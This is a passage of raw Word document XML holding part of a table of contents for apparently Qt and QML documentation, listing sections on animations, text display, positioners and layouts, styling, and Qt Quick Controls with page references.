          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>102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237" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Keyboard and Button Events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605237 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>103</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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use case - Animations In QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605238 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104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39" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Fluid UIs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605239 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>States and Transitions</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605240 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>104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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animating Property Changes.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605241 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>105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42" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605242 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>106</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43" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Displaying Text In QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605243 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Displaying and Formatting Text</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605244 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Laying Out Text</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605245 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>108</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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Internationalization and Scalability</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605246 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>110</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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Positioners and Layouts In QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605247 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>110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48" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Manual Positioning</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605248 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>110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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Anchors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605249 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>111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50" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Positioners</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605250 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>112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51" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605251 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>113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52" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use Case - Style And Theme Support</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605252 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>114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53" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using the Styling QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605253 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>114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54" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessing the System Palette</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605254 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>114</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605255" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls Overview</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605255 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>115</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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Getting Started</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605256 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>115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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating a basic example</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605257 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>115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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Setting Up Controls from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605258 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>116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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using C++ Data From QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605259 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>116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60" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Deploying Qt Quick Controls</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605260 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>116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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Testing Desktop and Mobile behavior of the controls</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605261 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>117</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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Related information</w:t>
        </w:r>
        <w:r>
